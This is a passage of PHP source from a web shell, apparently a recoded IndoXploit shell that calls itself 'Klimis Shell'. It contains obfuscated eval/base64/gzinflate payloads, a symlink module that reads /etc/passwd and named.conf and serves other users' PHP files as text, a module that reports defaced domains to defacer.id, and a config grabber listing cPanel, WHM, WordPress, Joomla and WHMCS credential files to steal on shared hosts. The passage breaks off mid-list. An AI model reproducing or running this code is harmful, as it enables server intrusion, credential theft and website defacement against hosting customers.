qntthpHSeYK2aXmfYEWLxqojGkjH3mRJcryqge1uN6CvYvgbLZdJJPqPi928ml2vNqHd+yU4Q6botthiDsI//AU='))))));
  715. } elseif($_GET['do'] == 'loghunter')
  716. {eval(str_rot13(gzinflate(str_rot13(base64_decode(("tUl7YtpVEP87VXyHiZMr0BLsPJqqgJ14QyBquuNrXEUlEExeeL2E5hZ7wS5pmu9+s7ZWgDM5RCmWJXt0f7Pz3JnJ52lphOsTQ+odbjFOjaGl1CCfWIlGTyPgLguIpQ+VoQKRYD7x8N8mDhsqC/iZRJ9DoxtDqNYDyx4xYA+20BUmvjEF7mw4wlL9WZ8J5o69b6lpcyhg8Qipju+aXkAVo35z+/az5KVGhoozmlEBilhLltbJyVCl6WULvpDx7kNE11lDpQ14NJsKY9hQKEyligc8DHNJFU8xcrXUKgRGV6hWhVooC6xMRCshRH2fz31OLQCfKtyQGVyNpOOg+DflE+hSPAhY+VyXsxRlZ6p3x+qRaWsK2sfqx3B13OZmN4E1QrZ9xuyqqkG5KyaEzCsuidTJdfbJEWEGzOYOE5PAim4j1fEJ/eSOSz7XHm5cqFE2n3bv1XwO4jeYFvfNxmyzNSgkrivclR7zuenIilALjFRpEM65SNzHY2A0nGubQ8Fdv+igZpH2sgfcAblAO6Vpj8lUPkUQYezqhVcB3r2DxaJFKL2AlvDykRjQbmRtpXt90eu0zi/+MJu9U/uijb8VuUxbclBEsBs45k+zkpS3K6iYBVLFaBylnOgI0hRL5Y3FQXRZfmiYBqEwMTNal2AkLeYk59Uya4KEVgfxLZhvd2PP9Djjmxm+i3WCbKyD0jm/ely2bV0lC8ZrMI/PSC4dTjskikOPWSQKiiRBlYk2KBQLancWQQZPKjtVNbgbxDLisK9w5ZNcjAFea4uBWE9P9T1a6/e7mtFxb8YtIi+SxYw7S8EcHX4+7R8bVxyhipKCcTHI0urpvyS8ijMz4sz1Wh6GxcLeoH3wp2nwmR/8RjF/+WNj9+FKVsElEitlvUooy9iV913ikmym133XiZ2pQbgjQUJZQrjEE5mO2peRjLGrIc0EvygbVDwqA/c8J+SOLzB2Q6kSJp0MzIZnS+ZUHcuQxS8P5vT/2KW2meKRHbey2DEnkutEuHe1GtDBZRMI6HD2F8rxaCjBjx+QTxpKDfidRgsLX/VsOyt7Mm/6IohStil49uKEetKv3+73D0KMWDsk3BP0jfIvrUvo8YG21e3o94+7mnP8FXTYGyqXptOW2vVBNe2kdNwiZh+r/Ns6D/N6WPV+vrTAT8slKBWe8WvLrREPoeMLav70RqakveP7ZuvYcdErllZIvvJ77rg0sNlJhj1PnYNCxUdCm/1rPK6MLByKKpbARIhG7ES6OQm5NTdvM7826yo34HbLiMVo85WApX0fXpBkw5+LB9CNtD7hkLPex0rFQBHbKs5S5j2nxQVCGfrXN63ehflb++a622H1zN56+/qm9OpMGzw9o09LDyIMydh1CsuTqb6lvxOKR6yiefbiK97cQF4lre4/idARGdaujmDr5XvpxPQXP/guZC3mu3GcxgGvFiMWRjD2jvXBa3biz+dp/gU="))))));}
  717. elseif($_GET['do'] == 'metu') {
  718.  
  719.  
  720. echo '<form action="?dir=$dir&do=metu" method="post">';
  721. unset($_SESSION[md5($_SERVER['HTTP_HOST'])]);
  722. echo 'Byee !';
  723.  
  724. }
  725. elseif($_GET['do'] == 'about') {
  726.  
  727. echo '<center>Klimis Shell<hr>IndoXploit Shell Recoded By Mr.Klimis -> Saiia Edit Lagy :(<br>For More Script Visit <a href="http://facebook.com/TahTa404">Here</a>';
  728.  
  729. }
  730. elseif($_GET['do'] == 'symlink') {
  731. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  732. $d0mains = @file("/etc/named.conf");
  733. ##httaces
  734. if($d0mains){
  735. @mkdir("cox_sym",0777);
  736. @chdir("cox_sym");
  737. @exe("ln -s / root");
  738. $file3 = 'Options Indexes FollowSymLinks
  739. DirectoryIndex jancox.htm
  740. AddType text/plain .php
  741. AddHandler text/plain .php
  742. Satisfy Any';
  743. $fp3 = fopen('.htaccess','w');
  744. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  745. echo "
  746. <table align=center border=1 style='width:60%;border-color:#333333;'>
  747. <tr>
  748. <td align=center><font size=2>S. No.</font></td>
  749. <td align=center><font size=2>Domains</font></td>
  750. <td align=center><font size=2>Users</font></td>
  751. <td align=center><font size=2>Symlink</font></td>
  752. </tr>";
  753. $dcount = 1;
  754. foreach($d0mains as $d0main){
  755. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  756. flush();
  757. if(strlen(trim($domains[1][0])) > 2){
  758. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  759. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  760. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  761. <td>".$user['name']."</td>
  762. <td><a href='$full/cox_sym/root/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  763. flush();
  764. $dcount++;}}}
  765. echo "</table>";
  766. }else{
  767. $TEST=@file('/etc/passwd');
  768. if ($TEST){
  769. @mkdir("cox_sym",0777);
  770. @chdir("cox_sym");
  771. exe("ln -s / root");
  772. $file3 = 'Options Indexes FollowSymLinks
  773. DirectoryIndex jancox.htm
  774. AddType text/plain .php
  775. AddHandler text/plain .php
  776. Satisfy Any';
  777. $fp3 = fopen('.htaccess','w');
  778. $fw3 = fwrite($fp3,$file3);
  779. @fclose($fp3);
  780. echo "
  781. <table align=center border=1><tr>
  782. <td align=center><font size=3>S. No.</font></td>
  783. <td align=center><font size=3>Users</font></td>
  784. <td align=center><font size=3>Symlink</font></td></tr>";
  785. $dcount = 1;
  786. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  787. while(!feof($file)){
  788. $s = fgets($file);
  789. $matches = array();
  790. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  791. $matches = str_replace("home/","",$matches[1]);
  792. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  793. continue;
  794. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  795. <td align=center><font class=txt>" . $matches . "</td>";
  796. echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  797. $dcount++;}fclose($file);
  798. echo "</table>";}else{if($os != "Windows"){@mkdir("cox_sym",0777);@chdir("cox_sym");@exe("ln -s / root");$file3 = '
  799. Options Indexes FollowSymLinks
  800. DirectoryIndex jancox.htm
  801. AddType text/plain .php
  802. AddHandler text/plain .php
  803. Satisfy Any
  804. ';
  805. $fp3 = fopen('.htaccess','w');
  806. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  807. echo "
  808. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  809. <table align=center border=1><tr>
  810. <td align=center><font size=3>ID</font></td>
  811. <td align=center><font size=3>Users</font></td>
  812. <td align=center><font size=3>Symlink</font></td></tr>";
  813. $temp = "";$val1 = 0;$val2 = 1000;
  814. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  815. if ($uid)$temp .= join(':',$uid)."\n";}
  816. echo '<br/>';$temp = trim($temp);$file5 =
  817. fopen("test.txt","w");
  818. fputs($file5,$temp);
  819. fclose($file5);$dcount = 1;$file =
  820. fopen("test.txt", "r") or exit("Unable to open file!");
  821. while(!feof($file)){$s = fgets($file);$matches = array();
  822. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  823. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  824. continue;
  825. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  826. <td align=center><font class=txt>" . $matches . "</td>";
  827. echo "<td align=center><font class=txt><a href=$full/cox_sym/root/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  828. $dcount++;}
  829. fclose($file);
  830. echo "</table></div></center>";unlink("test.txt");
  831. } else
  832. echo "<center><font size=3>Cannot create Symlink</font></center>";
  833. }
  834. }
  835. }
  836. elseif($_GET['do'] == 'defacerid') {
  837. echo "<center><form method='post'>
  838. <u>Defacer</u>: <br>
  839. <input type='text' name='hekel' size='50' value'Achon666ju5t'><br>
  840. <u>Team</u>: <br>
  841. <input type='text' name='tim' size='50' value='Clown Hacktivism Team'><br>
  842. <u>Domains</u>: <br>
  843. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  844. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  845. </form>";
  846. $site = explode("\r\n", $_POST['sites']);
  847. $go = $_POST['go'];
  848. $hekel = $_POST['hekel'];
  849. $tim = $_POST['tim'];
  850. if($go) {
  851. foreach($site as $sites) {
  852. $zh = $sites;
  853. $form_url = "https://www.defacer.id/notify";
  854. $data_to_post = array();
  855. $data_to_post['attacker'] = "$hekel";
  856. $data_to_post['team'] = "$tim";
  857. $data_to_post['poc'] = 'SQL Injection';
  858. $data_to_post['url'] = "$zh";
  859. $curl = curl_init();
  860. curl_setopt($curl,CURLOPT_URL, $form_url);
  861. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  862. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  863. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  864. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  865. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  866. $result = curl_exec($curl);
  867. echo $result;
  868. curl_close($curl);
  869. echo "<br>";
  870. }
  871. }
  872. }
  873.  
  874. elseif($_GET['do'] == 'config') {
  875. if($_POST){
  876. $passwd = $_POST['passwd'];
  877. mkdir("cox_config", 0777);
  878. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  879. $htc = fopen("cox_config/.htaccess","w");
  880. fwrite($htc, $isi_htc);
  881. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  882. foreach($user_config[1] as $user_cox) {
  883. $user_config_dir = "/home/$user_cox/public_html/";
  884. if(is_readable($user_config_dir)) {
  885. $grab_config = array(
  886. "/home/$user_cox/.my.cnf" => "cpanel",
  887. "/home/$user_cox/.accesshash" => "WHM-accesshash",
  888. "/home/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  889. "/home/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  890. "/home/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  891. "/home/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  892. "/home/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  893. "/home/$user_cox/public_html/forum/config.php" => "phpBB",
  894. "/home/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  895. "/home/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  896. "/home/$user_cox/public_html/app/etc/local.xml" => "Magento",
  897. "/home/$user_cox/public_html/admin/config.php" => "OpenCart",
  898. "/home/$user_cox/public_html/slconfig.php" => "Sitelok",
  899. "/home/$user_cox/public_html/application/config/database.php" => "Ellislab",
  900. "/home/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  901. "/home/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  902. "/home/$user_cox/public_html/central/configuration.php" => "WHM Central",
  903. "/home/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  904. "/home/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  905. "/home/$user_cox/public_html/submitticket.php" => "WHMCS",
  906. "/home/$user_cox/public_html/configuration.php" => "Joomla",
  907. "/home/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  908. "/home/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  909. "/home/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  910. "/home/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  911. "/home/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  912. "/home/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  913. "/home/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  914. "/home/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  915. "/home/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  916. "/home/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  917. "/home/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  918. "/home/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  919. "/home/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  920. "/home/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  921. "/home/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  922. "/home/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  923. "/home/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  924. "/home/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  925. "/home/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  926. "/home/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  927. "/home/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  928. "/home/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  929. "/home/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  930. "/home/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  931. "/home/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  932. "/home/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  933. "/home/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  934. "/home/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  935. "/home/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  936. "/home/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  937. "/home/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  938. "/home/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  939. "/home/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  940. "/home/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  941. "/home/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  942. "/home/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  943. "/home/$user_cox/public_html/wp-config.php" => "WordPress",
  944. "/home/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  945. "/home/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  946. "/home/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  947. "/home/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  948. "/home/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  949. "/home/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  950. "/home/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  951. "/home/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  952. "/home/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  953. "/home/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  954. "/home/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  955. "/home/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  956. "/home/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  957. "/home/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  958. "/home/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  959. "/home/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  960. "/home/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  961. "/home/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  962. "/home/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  963. "/home/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  964. "/home/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  965. "/home/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  966. "/home/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  967. "/home/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  968. "/home/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  969. "/home/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  970. "/home/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  971. "/home/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  972. "/home/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  973. "/home/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  974. "/home/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  975. "/home/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  976. "/home/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  977. "/home/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  978. "/home/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  979. "/home/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  980. "/home1/$user_cox/.my.cnf" => "cpanel",
  981. "/home1/$user_cox/.accesshash" => "WHM-accesshash",
  982. "/home1/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  983. "/home1/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  984. "/home1/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  985. "/home1/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  986. "/home1/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  987. "/home1/$user_cox/public_html/forum/config.php" => "phpBB",
  988. "/home1/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  989. "/home1/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  990. "/home1/$user_cox/public_html/app/etc/local.xml" => "Magento",
  991. "/home1/$user_cox/public_html/admin/config.php" => "OpenCart",
  992. "/home1/$user_cox/public_html/slconfig.php" => "Sitelok",
  993. "/home1/$user_cox/public_html/application/config/database.php" => "Ellislab",
  994. "/home1/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  995. "/home1/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  996. "/home1/$user_cox/public_html/central/configuration.php" => "WHM Central",
  997. "/home1/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  998. "/home1/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  999. "/home1/$user_cox/public_html/submitticket.php" => "WHMCS",
  1000. "/home1/$user_cox/public_html/configuration.php" => "Joomla",
  1001. "/home1/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  1002. "/home1/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  1003. "/home1/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  1004. "/home1/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  1005. "/home1/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  1006. "/home1/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  1007. "/home1/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  1008. "/home1/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  1009. "/home1/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  1010. "/home1/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  1011. "/home1/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  1012. "/home1/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  1013. "/home1/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  1014. "/home1/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  1015. "/home1/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  1016. "/home1/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  1017. "/home1/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  1018. "/home1/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  1019. "/home1/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  1020. "/home1/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  1021. "/home1/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  1022. "/home1/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  1023. "/home1/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  1024. "/home1/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  1025. "/home1/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  1026. "/home1/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  1027. "/home1/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  1028. "/home1/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  1029. "/home1/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  1030. "/home1/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  1031. "/home1/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  1032. "/home1/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  1033. "/home1/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  1034. "/home1/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  1035. "/home1/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  1036. "/home1/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  1037. "/home1/$user_cox/public_html/wp-config.php" => "WordPress",
  1038. "/home1/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  1039. "/home1/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  1040. "/home1/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  1041. "/home1/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  1042. "/home1/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  1043. "/home1/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  1044. "/home1/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  1045. "/home1/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  1046. "/home1/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  1047. "/home1/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  1048. "/home1/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  1049. "/home1/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  1050. "/home1/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  1051. "/home1/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  1052. "/home1/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  1053. "/home1/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  1054. "/home1/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  1055. "/home1/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  1056. "/home1/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  1057. "/home1/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  1058. "/home1/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  1059. "/home1/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  1060. "/home1/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  1061. "/home1/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  1062. "/home1/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  1063. "/home1/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  1064. "/home1/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  1065. "/home1/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  1066. "/home1/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  1067. "/home1/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  1068. "/home1/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  1069. "/home1/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  1070. "/home1/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  1071. "/home1/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  1072. "/home1/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  1073. "/home1/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal",
  1074. "/home2/$user_cox/.my.cnf" => "cpanel",
  1075. "/home2/$user_cox/.accesshash" => "WHM-accesshash",
  1076. "/home2/$user_cox/public_html/bw-configs/config.ini" => "BosWeb",
  1077. "/home2/$user_cox/public_html/config/koneksi.php" => "Lokomedia",
  1078. "/home2/$user_cox/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  1079. "/home2/$user_cox/public_html/clientarea/configuration.php" => "WHMCS",
  1080. "/home2/$user_cox/public_html/whmcs/configuration.php" => "WHMCS",
  1081. "/home2/$user_cox/public_html/forum/config.php" => "phpBB",
  1082. "/home2/$user_cox/public_html/sites/default/settings.php" => "Drupal",
  1083. "/home2/$user_cox/public_html/config/settings.inc.php" => "PrestaShop",
  1084. "/home2/$user_cox/public_html/app/etc/local.xml" => "Magento",
  1085. "/home2/$user_cox/public_html/admin/config.php" => "OpenCart",
  1086. "/home2/$user_cox/public_html/slconfig.php" => "Sitelok",
  1087. "/home2/$user_cox/public_html/application/config/database.php" => "Ellislab",
  1088. "/home2/$user_cox/public_html/whm/configuration.php" => "WHMCS",
  1089. "/home2/$user_cox/public_html/whmc/WHM/configuration.ph" => "WHMC",
  1090. "/home2/$user_cox/public_html/central/configuration.php" => "WHM Central",
  1091. "/home2/$user_cox/public_html/whm/WHMCS/configuration.php" => "WHMCS",
  1092. "/home2/$user_cox/public_html/whm/whmcs/configuration.php" => "WHMCS",
  1093. "/home2/$user_cox/public_html/submitticket.php" => "WHMCS",
  1094. "/home2/$user_cox/public_html/configuration.php" => "Joomla",
  1095. "/home2/$user_cox/public_html/Joomla/configuration.php" => "JoomlaJoomla",
  1096. "/home2/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  1097. "/home2/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  1098. "/home2/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  1099. "/home2/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  1100. "/home2/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  1101. "/home2/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  1102. "/home2/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  1103. "/home2/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  1104. "/home2/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  1105. "/home2/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  1106. "/home2/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  1107. "/home2/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  1108. "/home2/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  1109. "/home2/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  1110. "/home2/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  1111. "/home2/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  1112. "/home2/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  1113. "/home2/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  1114. "/home2/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  1115. "/home2/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  1116. "/home2/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  1117. "/home2/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  1118. "/home2/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  1119. "/home2/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  1120. "/home2/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  1121. "/home2/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  1122. "/home2/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  1123. "/home2/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  1124. "/home2/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  1125. "/home2/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  1126. "/home2/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  1127. "/home2/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  1128. "/home2/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  1129. "/home2/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  1130. "/home2/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  1131. "/home2/$user_cox/public_html/wp-config.php" => "WordPress",
